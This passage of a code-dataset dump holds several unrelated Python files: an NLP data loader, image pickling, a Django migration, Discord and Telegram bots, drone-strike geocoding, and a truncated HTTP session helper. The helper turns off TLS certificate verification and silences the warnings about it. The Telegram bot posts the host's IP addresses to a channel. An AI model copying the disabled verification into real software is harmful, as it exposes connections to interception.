sent += 1\n\t\t\t# if sent > 10: break\n\t\t\tcontinue\n\t\tlines.append(line)\n\tf.close()\n\n\t# num_x = len(lines)\n\n\t# load bows\n\t# sents = np.zeros((num_x, len(w2i)), dtype = theano.config.floatX) \n\tsents = list()\n\tf = open(f_path + \".tf\", \"r\", encoding=chosen_encodings[0])\n\ti = 0\n\tfor line in f:\n\t\tsent = torch.zeros(len(w2i), dtype=torch.float)\n\t\tline = line.strip('\\n')\n\t\ttfs = line.split(\"|\")\n\t\ti += 1\n\t\tif '***' in line:\n\t\t\tcontinue\n\t\tfor tf in tfs:\n\t\t\tfields = tf.split(\"=====\")\n\t\t\tif len(fields) < 2:\n\t\t\t\t#print \"Error.tf\"\n\t\t\t\tcontinue\n\t\t\tif fields[0] in forgotten_punct: continue\n\t\t\tsent[w2i[fields[0]]] = float(fields[1])\n\t\tsents.append(sent)\n\n\tnum_x = len(sents)\n\tsents = torch.stack(sents)\n\n\tf.close()\n\t#normalization\n\tfor i in range(num_x):\n\t\tnorm2 = torch.norm(sents[i, :])\n\t\tif norm2 == 0:\n\t\t\tnorm2 = 1\n\t\tsents[i, :] = sents[i, :] / norm2\n\n\t# load entities\n\t# entities = np.zeros((1, len(w2i)), dtype = theano.config.floatX)\n\tentities = torch.zeros((1, len(w2i)), dtype = torch.float)\n\tf = open(f_path + \".entities\", \"r\", encoding=chosen_encodings[0])\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\tfields = line.split(\"=====\")\n\t\tif len(fields) < 2:\n\t\t\tprint(\"Error.entities\")\n\t\t\tcontinue\n\t\tentities[0, w2i[fields[0]]] = float(fields[1])\n\tf.close()\n\tentities = entities / torch.norm(entities)\n\n\t# load weights\n\t# f = open(f_path + \".weight\", \"r\")\n\t# for line in f:\n\t\t# line = line.strip('\\n')\n\t\t# fields = line.split()\n\t\t# if len(fields) < 2:\n\t\t\t# print(\"Error.weight\")\n\t\t\t# continue\n\t\t# w_pos.append(float(fields[0]))\n\t\t# w_concept.append(float(fields[1]))\n\t# f.close()\n\n\treturn i2w, w2i, sents, lines, w_pos, entities\n\n\ndef word_sequence(f_path, batch_size = 1):\n\tstop_words = load_stop_words()\n\tseqs = []\n\ti2w = {}\n\tw2i = {}\n\tlines = []\n\ttf = {}\n\tpara_info = []\n\n\ttmp_sents = []\n\tlast_sents = []\n\n\tf = open(curr_path + \"/\" + f_path, \"r\")\n\tparagraph_now = 0\n\tfor line in f:\n\t\tline = line.strip('\\n').lower()\n\t\twords = line.split()\n\n\t\tif line == \"====\":\n\t\t\tparagraph_now = 0\n\t\t\tcontinue\n\t\tif len(words) < 3:\n\t\t\tif len(words) == 0 and paragraph_now < par_bar:\n\t\t\t\tparagraph_now += 1\n\t\t\tcontinue\n\t\twords.append(\"\") # end symbol\n\t\twords.append(\"\") \n\t\ttmp_sents.append(line)\n\t\tlines.append(words)\n\t\tpara_info.append(paragraph_now)\n\t\tfor w in words:\n\t\t\tif w not in w2i:\n\t\t\t\ti2w[len(w2i)] = w\n\t\t\t\tw2i[w] = len(w2i)\n\t\t\t\ttf[w] = 1\n\t\t\telse:\n\t\t\t\ttf[w] += 1\n\tf.close()\n\n\tnum_x = len(lines) \n\t#num_x = 30\n\tfor i in range(len(para_info)):\n\t\tpara_info[i] = par_const ** para_info[i]\n\t# represent sentences with word-bag model\n\t# sents = np.zeros((num_x, len(w2i)), dtype = theano.config.floatX) # row: each sentence\n\tsents = torch.zeros((num_x, len(w2i)), dtype=torch.float)\n\tfor i in range(0, num_x):\n\t\tlast_sents.append(tmp_sents[i])\n\n\t\teach_sent = lines[i]\n\t\t# x = np.zeros((len(each_sent), len(w2i)), dtype = theano.config.floatX) # row: each word position\n\t\tx = torch.zeros((len(each_sent), len(w2i)), dtype = torch.float) # row: each word position\n\t\tfor j in range(0, len(each_sent)):\n\t\t\teach_word = each_sent[j]\n\t\t\tx[j, w2i[each_word]] = 1\n\t\t\tif each_word not in stop_words:\n\t\t\t\tsents[i, w2i[each_word]] += 1\n\n\t\tseqs.append(x)\n\tseqs = torch.stack(seqs)\n\n\t#normalization\n\tfor i in range(num_x):\n\t\tnorm2 = torch.norm(sents[i, :])\n\t\tif norm2 == 0:\n\t\t\tnorm2 = 1\n\t\tsents[i, :] = sents[i, :] / norm2\n\n\n\tdata_xy = batch_sequences(seqs, i2w, w2i, para_info, batch_size)\n\tprint(\"#dic = \" + str(len(w2i)))\n\treturn seqs, i2w, w2i, data_xy, sents, last_sents\n\ndef batch_sequences(seqs, i2w, w2i, paragraph_info, batch_size):\n\tdata_xy = {}\n\tbatch_x = []\n\tbatch_y = []\n\tbatch_paragraph_info = []\n\tseqs_len = []\n\tbatch_id = 0\n\tdim = len(w2i)\n\t# zeros_m = np.zeros((1, dim), dtype = theano.config.floatX)\n\tzeros_m = torch.zeros((1, dim), dtype = torch.float)\n\tfor i in range(len(seqs)):\n\t\tseq = seqs[i]\n\t\tX = seq[0 : len(seq) - 1, ]\n\t\tY = seq[1 : len(seq), ]\n\t\tbatch_x.append(X)\n\t\tseqs_len.append(X.shape[0])\n\t\tbatch_y.append(Y)\n\t\tbatch_paragraph_info.append(paragraph_info[i])\n\n\t\tif len(batch_x) == batch_size or (i == len(seqs) - 1):\n\t\t\t# tmp_sum = float(sum(batch_paragraph_info))\n\t\t\t# batch_paragraph_info = [(lambda x : x / tmp_sum)(x) for x in batch_paragraph_info]\n\n\t\t\tmax_len = np.max(seqs_len)\n\t\t\t# mask = np.zeros((max_len, len(batch_x)), dtype = theano.config.floatX)\n\t\t\tmask = torch.zeros((max_len, len(batch_x)), dtype = torch.float)\n\n\t\t\t# concat_X = np.zeros((max_len, len(batch_x) * dim), dtype = theano.config.floatX)\n\t\t\tconcat_X = torch.zeros((max_len, len(batch_x) * dim), dtype = torch.float)\n\t\t\tconcat_Y = concat_X.clone()\n\t\t\tfor b_i in range(len(batch_x)):\n\t\t\t\tX = batch_x[b_i]\n\t\t\t\tY = batch_y[b_i]\n\t\t\t\tmask[0 : X.shape[0], b_i] = 1\n\t\t\t\tfor r in range(max_len - X.shape[0]):\n\t\t\t\t\tX = np.concatenate((X, zeros_m), axis=0)\n\t\t\t\t\tY = np.concatenate((Y, zeros_m), axis=0)\n\t\t\t\tconcat_X[:, b_i * dim : (b_i + 1) * dim] = X \n\t\t\t\tconcat_Y[:, b_i * dim : (b_i + 1) * dim] = Y\n\t\t\tdata_xy[batch_id] = (concat_X, concat_Y, mask, len(batch_x), np.array(batch_paragraph_info))\n\t\t\tbatch_x = []\n\t\t\tbatch_y = []\n\t\t\tbatch_paragraph_info = []\n\t\t\tseqs_len = []\n\t\t\tbatch_id += 1\n\treturn data_xy\n\nif __name__ == '__main__':\n\tbase_path = \"../data/TAC2011/Amish Shooting\"\n\ti2w, w2i, sents, lines, w_pos, w_concept, entities = load(base_path)", "sub_path": "data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 6875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 12, "usage_type": "call"}, {"api_name": "pkgutil.walk_packages", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "encodings.__file__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "encodings.aliases.aliases.values", "line_number": 21, "usage_type": "call"}, {"api_name": "encodings.aliases", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 89, "usage_type": 
"attribute"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 117, "usage_type": "attribute"}, {"api_name": "torch.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 195, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 226, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "336355887", "text": "import pandas as pd \nfrom skimage import io\nimport pickle\n\nreviews = pd.read_csv('4_15_2019.tsv', sep='\\t')\ndf_reviews = reviews[['shoeName','shoe_image']]\ndictionary = {}\nfor i in range(10):\n\tshoe_name = df_reviews.iloc[i][\"shoeName\"]\n\tshoe_image = df_reviews.iloc[i][\"shoe_image\"]\n\tshoe_image_array = io.imread(shoe_image)[:, :, :-1]\n\tdictionary[shoe_name] = shoe_image_array\nprint(len(dictionary))\npickle.dump( dictionary, open( \"shoes_images.p\", \"wb\" ) )\n\n", "sub_path": "app/images_to_bytes.py", "file_name": "images_to_bytes.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "611723062", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0003_auto_20151112_0212'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BoyGirlQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('choice', models.BooleanField(default=False, choices=[(0, b'Boy'), (1, b'Girl')])),\n ('name', models.CharField(max_length=60)),\n ],\n ),\n migrations.RemoveField(\n model_name='choice',\n name='question',\n ),\n migrations.DeleteModel(\n name='Choice',\n ),\n migrations.DeleteModel(\n name='Question',\n ),\n ]\n", "sub_path": "core/migrations/0004_auto_20151114_0225.py", "file_name": "0004_auto_20151114_0225.py", "file_ext": "py", "file_size_in_byte": 883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.DeleteModel", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.DeleteModel", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "224196419", "text": "from enum import Enum\n\nfrom gi.repository import GLib\n# importing the necessary libraries\n\n#class enumerates the types of media that can be displayed\t\nclass media_type_t(Enum):\n\tMEDIA_TYPE_QRCODE = 0\n\tMEDIA_TYPE_IMAGE = 1\n\tMEDIA_TYPE_GIF = 2\n\n\n\n\n#class enumerates the types of screens\nclass screen_type_t(Enum):\n\tSCREEN_TYPE_S1 = 0\n\tSCREEN_TYPE_S2 = 1\n\n\n\n\n#class enumerates the types of cards\nclass card_type_t(Enum):\n\tCARD_TYPE_W100_BLUE_SPALSH = 0\n\tCARD_TYPE_W100_GRAY_MEDIA = 1\n\tCARD_TYPE_W100_GRAY_STRING3 = 2\n\tCARD_TYPE_W100_GRAY_MEDIA_STRING3 = 3\n\tCARD_TYPE_W100_RED_MEDIA_STRING3 = 4\n\tCARD_TYPE_W100_USERCOLOR_MEDIA_STRING_3 = 5\n\tCARD_TYPE_W50_RED_MEDIA_STRING2 = 6\n\tCARD_TYPE_W50_AMBER_MEDIA_STRING2 = 7\n\tCARD_TYPE_W50_GRAY_MEDIA_STRING2 = 8\n\tCARD_TYPE_W50_GREEN_MEDIA_STRING2 = 9\n\tCARD_TYPE_W50_BLUE_MEDIA_STRING2 = 10\n\tCARD_TYPE_W50_USERCOLOR_MEDIA_STRING2 = 11\n\tCARD_TYPE_W50_GREEN_TITLE_STRING4 = 12\n\tCARD_TYPE_W50_GREEN_TITLE_STRING3 = 13\n\n\n\n\n\nclass screen_ui_t(): \n\n\t\tdef __init__(self):\n\t\t\t#instatiating the station info class\n\t\t\tself.Station_Info = station_info_t()\n\t\t\tself.Header_Vis = header_visibility\n\t\t\tself.Card_UI_T = card_ui_t\n\n\n\n\t\t\n\n\t\t\"\"\"\n\t\tObject 1\n\t\t\tThis reads the type of screen from the user\n\t\t\"\"\"\n\t\tchoice = int(input('Enter a screen type (0=TYPE_S1/1=TYPE_S2): '))\n\t\tif choice == 0:\n\t\t\tprint('Screen set to: {}\\n'.format(screen_type_t.SCREEN_TYPE_S1))\n\t\telif choice == 1:\n\t\t\tprint('Screen set to: {}\\n'.format(screen_type_t.SCREEN_TYPE_S2))\n\t\telse:\n\t\t\tprint('Invalid input\\n')\n\n\n\n\t\t\n\n\t\t\"\"\"\n\t\tObject 2\n\t\t\tThis reads and sets the Station's Serial Address\n\t\t\"\"\"\n\t\tclass station_info_t:\n\t\t\tserial = str(input('Enter Serial number of station: '))\n\t\t\t#reads Serial number of the station\n\t\t\tprint('Serial address set as: {}\\n'.format(serial))\n\t\t\t\n\n\n\n\n\t\t\"\"\"\n\t\tObject 3\n\t\t\tThis sets or clears the header visiblity on the screen\n\t\t\"\"\"\n\t\theader = int(input('Header visibility (0=HIDE/1=SHOW): '))\n\t\t#reads the 
choice to show or hide header (sets Bool values based on user choice)\n\t\tif header == 0:\n\t\t\theader_visibility = False\n\t\t\tprint('Header set to HIDE\\n')\n\t\telif header == 1:\n\t\t\theader_visibility = True\n\t\t\tprint('Header set to SHOW\\n')\n\t\telse:\n\t\t\tprint('Invalid input\\n')\n\t\t\texit()\n\t\t\n\t\t\n\n\n\n\n\t\t\"\"\"\n\t\tObject 4\n\t\t\tThis reads Card parameters from the user and sets the same to each card\n\t\t\"\"\"\n\t\tclass card_ui_t:\n\n\n\t\t\t#parameter 1\n\t\t\ti = 0 #to display count of ENUM listing\n\t\t\tfor types in card_type_t:\n\t\t\t\tprint('{}'.format(i), types)\n\t\t\t\ti += 1\n\t\t\ttry:\n\t\t\t\tcard_type = int(input('Enter ENUM index (0-13)\\nSelect Card type: '))\n\t\t\t\t#reads card type from user\n\t\t\t\t#assigns through ENUM index\n\t\t\t\tprint('Card type set to: ')\n\t\t\t\tprint(card_type_t(card_type))\n\t\t\texcept:\n\t\t\t\tprint('Input value does not match any defined card types')\n\t\t\t\texit()\n\t\t\t\t\n\t\t\t\n\t\t\t#parameter 2\n\t\t\t#this parameter is read only if the user chooses \n\t\t\t#5 card_type_t.CARD_TYPE_W100_USERCOLOR_MEDIA_STRING_3 or \n\t\t\t#11 card_type_t.CARD_TYPE_W50_USERCOLOR_MEDIA_STRING2\n\t\t\tif card_type == 5 or card_type == 11:\n\t\t\t\tcard_bgcolor = int(input('\\nEnter Background Color: '))\n\t\t\t\t#reads background color from user\n\t\t\t\t#assumed to be a integer value\n\t\t\t\tprint('Background color set to: {}\\n'.format(card_bgcolor))\n\t\t\telse:\n\t\t\t\tprint('Background color set by default as per card formatting\\n')\n\n\n\t\t\t#parameter 3\n\t\t\tslot_index = int(input('Enter the slot index (0=LEFT/1=RIGHT): '))\n\t\t\tprint('Slot index set as: {}\\n'.format(slot_index))\n\t\t\t\n\n\n\t\t\t#parameter 4\n\t\t\tchoice = int(input('FLIPPER Visibility (0=HIDE/1=SHOW): '))\n\t\t\t#reads users choice to either show or hide flipper.\n\t\t\t#sets Bool value appropriately\n\t\t\tif choice == 0:\n\t\t\t\tflipper_visibility = False\n\t\t\t\tprint('Flipper set to HIDE\\n')\n\t\t\telif choice == 1:\n\t\t\t\tflipper_visibility = True\n\t\t\t\tprint('Flipper set to SHOW\\n')\n\t\t\telse:\n\t\t\t\tprint('Invalid choice\\n')\n\t\t\t\texit()\n\t\t\t\n\n\n\t\t\t#parameter 4\n\t\t\tflipper_index = int(input('Enter the flipper index: '))\n\t\t\t#reads index of Flipper from user\n\t\t\tprint('Flipper index set to: {}\\n'.format(flipper_index))\n\t\t\t\n\n\n\n\t\t\t#parameter 5\n\t\t\ti = 0\t#to display count of ENUM listing\n\t\t\tfor media in media_type_t:\n\t\t\t\tprint('{}'.format(i), media)\n\t\t\t\ti += 1\n\t\t\tmedia_type = int(input('Enter ENUM index (0-2)\\nSelect Media type: '))\n\t\t\t#reads the media type from user through ENUM index\n\t\t\tprint('Media type set to: ')\n\t\t\tprint(media_type_t(media_type))\n\t\t\t\n\t\t\t#parameter 6 hardcoded now as recommended\n\t\t\tif media_type == 0:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/QR_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telif media_type == 1:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/IMAGE_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telif media_type == 2:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/GIF_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telse:\n\t\t\t\tprint('Invalid Media Type\\n')\n\t\t\t\texit()\n\t\t\t\n\t\t\t\n\t\t\t#parameter 7\n\t\t\t#reads the title for the card selected \n\t\t\ttitle = str(input('Enter the title of card {}: '.format(slot_index)))\n\t\t\tprint('Title 
for Card {} set as: {}'.format(slot_index,title))\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t#parameter 8,9,10,11\n\t\t\t#Only strings relevant to the user selected cards are read.\n\t\t\t#Other strings are ignored\n\t\t\t#cards 1 and 2 expect no string\n\t\t\tif card_type == 2 or card_type == 3 or card_type == 4 or card_type == 5 or card_type == 13:\n\t\t\t#cards 2, 3, 4 5 and 13 expect 3 strings\n\t\t\t\tprint('Selected card {} expects 3 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\t\t\t\tstring3 = str(input('Enter string 3: '))\n\t\t\t\t\n\t\t\t\tprint('String 1: {}\\nString 2: {}\\nString 3: {}'.format(string1, string2, string3))\n\n\t\t\telif card_type == 6 or card_type == 7 or card_type == 8 or card_type == 9 or card_type == 10 or card_type == 11:\n\t\t\t#cards 6, 7, 8, 9, 10, 11 expect 2 strings\n\t\t\t\tprint ('Selected card {} expects 2 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\n\t\t\t\tprint('String 1: {}\\nString 2: {}'.format(string1, string2))\n\t\t\t\t\n\t\t\telif card_type == 12:\n\t\t\t\tprint('Selected card {} expects 4 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\t\t\t\tstring3 = str(input('Enter string 3: '))\n\t\t\t\tstring4 = str(input('Enter string 4: '))\n\t\t\t\t\n\t\t\t\tprint('String 1: {}\\nString 2: {}\\nString 3: {}\\nString 4: {}'.format(string1, string2, string3, string4))\n\t\t\t\n\t\t\telse: \n\t\t\t\tprint('Selected card {} does not expect any strings\\n'.format(card_type_t(card_type)))", "sub_path": "Client_V1.0.py", "file_name": "Client_V1.0.py", "file_ext": "py", "file_size_in_byte": 6631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 16, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 24, "usage_type": "name"}]}
+{"seq_id": "152763347", "text": "import discord\ndef do():\n    from uni_network import uni_class, log\n    bot = uni_class.bot\n    @bot.event\n    async def on_ready():\n        # Prints the bot's ID and nickname to the screen.\n        print(\"=============================================\")\n        print(\"Discord Started as ...\")\n        print(\"bot name : \" + str(bot.user.name))\n        print(\"bot id : \" + str(bot.user.id))\n        print(\"=============================================\")\n        activity = discord.Game(name=\"🔎/help\")\n        await bot.change_presence(status=discord.Status.online, activity=activity)\n    return", "sub_path": "uni_network/Utility/Event/bot_on.py", "file_name": "bot_on.py", "file_ext": "py", "file_size_in_byte": 612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "uni_network.uni_class.bot", "line_number": 4, "usage_type": "attribute"}, {"api_name": "uni_network.uni_class", "line_number": 4, "usage_type": "name"}, {"api_name": "discord.Game", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.Status", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "410501247", "text": "# coding=utf-8\nimport io\nimport json\nimport os\nfrom functools import lru_cache\n\nimport feather\nimport pandas as pd\nimport requests\nfrom geopy.geocoders import Nominatim\nfrom tqdm import tqdm\n\ngeolocator = Nominatim()\n\n\ndef public_google_sheet_reader(file_id, sheet_id):\n    \"\"\"\n    Will take parts of a url and return a pandas dataframe\n\n    Research:\n    Surprisingly difficult to figure out the format for the URL\n\n    Sources:\n    http://www.madhur.co.in/blog/2016/05/13/google-docs-spreadsheet.html\n    https://gist.github.com/cspickert/1650271\n\n    Example:\n    For a URL https://docs.google.com/spreadsheets/d/1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc/edit#gid=1283746305\n\n    file_id = '1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc'\n    sheet_id = 1283746305\n\n    :param file_id: string\n    :param sheet_id: string\n    :return: pd.DataFrame()\n    \"\"\"\n    url = f\"https://docs.google.com/spreadsheets/d/{file_id}/export?format=csv&id={file_id}&gid={sheet_id}\"\n    r = requests.get(url)\n    sio = io.StringIO(r.text, newline=None)\n    df = pd.read_csv(sio)\n    columns = ['strike', 'date', 'village', 'district', 'province', 'attack_type', 'is_drone', 'confirmed_us',\n               'only_us',\n               'reason', 'reported_target_group', 'time', 'reported_target_type', 'minimum_strikes', 'maximum_strikes',\n               'minimum_total_people_killed', 'maximum_total_people_killed', 'minimum_civilians_reported_killed',\n               'maximum_civilians_reported_killed', 'minimum_children_reported_killed',\n               'maximum_children_reported_killed',\n               'minimum_reported_injured', 'maximum_reported_injured', 'strike_link', 'timeline_url', 'index']\n    df.columns = columns\n    return df.iloc[:-1, :]\n\n\n@lru_cache()\ndef get_location(geo: Nominatim, loc: str) -> tuple:\n    \"\"\"\n    Will attempt to retrieve location with as much information as possible. If geocoder doesn't understand the string\n    get_location will reduce the string to remove the most specific information in the location string.\n    :rtype: tuple\n    :type geo: Nominatim\n    :type loc: str\n    :param geo: The Nominatim() type... 
I might need to find a better place for this\n :param loc: The location that you want to look up\n :return: A tuple with lat and long then the passed in location and the address from the geocoder.\n \"\"\"\n\n try:\n result = geolocator.geocode(loc)\n coordinates = (result.latitude, result.longitude, loc, result.address)\n print(loc, result.address)\n except AttributeError:\n return get_location(geo, loc.split(' ', 1)[-1])\n return coordinates\n\n\ndef create_data_frame(output_path):\n global geolocator\n afghanistan_file_id = \"1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc\"\n data_sheet_id = '0'\n df = public_google_sheet_reader(afghanistan_file_id, data_sheet_id)\n # There are some incorrect location names as far as the geocoder is concerned\n # The following dictionary and for loops are to fix that\n replace_village = {}\n replace_district = {\n 'Lal Pura': 'Lal Pur'\n }\n replace_province = {}\n replace_structure = {\n 'village': replace_village,\n 'district': replace_district,\n 'province': replace_province,\n }\n for col, replace_dict in replace_structure.items():\n if not replace_dict:\n continue\n for old, new in replace_dict.items():\n df[col].replace(old, new)\n geocoding_series = []\n loc_string_series = []\n coords_json = 'geocode.json'\n with open(coords_json, 'r') as fp:\n geocode_dict = json.load(fp)\n for index, row in tqdm(df.iterrows()):\n # *coords, loc, address = [None] * 4\n village = '' if any(word in row['village'] for word in ['-', 'Unknown', ',']) else row[\n 2].strip() + ', '\n district = '' if any(word in row['district'] for word in ['-', 'Unknown', ',']) else row[3].strip() + ', '\n province = '' if any(word in row['province'] for word in ['-', 'Unknown', ',']) else row[4].strip() + ', '\n loc_string = '{}{}{}Afghanistan'.format(village, district, province)\n if loc_string not in geocode_dict.keys():\n *coords, loc, geo_address = get_location(geolocator, loc_string)\n else:\n coords = geocode_dict[loc_string]\n loc_string_series.append(loc_string)\n geocoding_series.append(coords)\n geocode_dict[loc_string] = coords\n with open(coords_json, 'w') as fp:\n json.dump(geocode_dict, fp)\n df['loc_string'] = loc_string_series\n df['lat'] = [x[0] for x in geocoding_series]\n df['lon'] = [x[1] for x in geocoding_series]\n print(f'Writing feather file to: {output_path}')\n feather.write_dataframe(df, output_path)\n\n\nif __name__ == '__main__':\n data_frame_path = os.path.join(os.path.dirname(__file__), os.pardir, 'data', 'us_strikes.feather')\n create_data_frame(data_frame_path)\n", "sub_path": "Python/get_data.py", "file_name": "get_data.py", "file_ext": "py", "file_size_in_byte": 5004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "geopy.geocoders.Nominatim", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "geopy.geocoders.Nominatim", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 100, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 101, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 116, "usage_type": "call"}, {"api_name": "feather.write_dataframe", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", 
"line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 125, "usage_type": "attribute"}]} +{"seq_id": "105962061", "text": "import botogram\r\nimport requests\r\nimport socket\r\n\r\ndef loadVar(file):\r\n with open(file, \"r\") as file:\r\n var = str(file.read()).rstrip(\"\\n\")\r\n return var\r\n\r\ntoken = loadVar(\"assets/token.txt\")\r\nbot = botogram.create(token)\r\n\r\nif __name__ == \"__main__\":\r\n channelToken = loadVar(\"assets/channelToken.txt\")\r\n IPAddr = socket.gethostbyname(socket.gethostname())\r\n ip = requests.get('https://checkip.amazonaws.com').text.strip()\r\n bot.chat(channelToken).send(str(IPAddr) + \" | \" + str(ip) + \" listening!\")\r\n", "sub_path": "BEA/bots/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "botogram.create", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "104853248", "text": "import os\nimport time\nimport json\nimport urllib\nimport urllib3\nimport requests\nimport random\n\nimport pandas as pd\n\n\nclass Query(object):\n def get_session(self):\n \"\"\"创建 session 示例,以应对多线程\"\"\"\n\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n # 设置重连次数\n requests.adapters.DEFAULT_RETRIES = 10\n # 设置连接活跃状态为False\n session = requests.session()\n session.keep_alive = False\n session.verify = False\n\n adapter = requests.adapters.HTTPAdapter(max_retries=3)\n # 将重试规则挂载到http和https请求\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n return session\n\n def deal_re(self, byte=False, need_header=False, 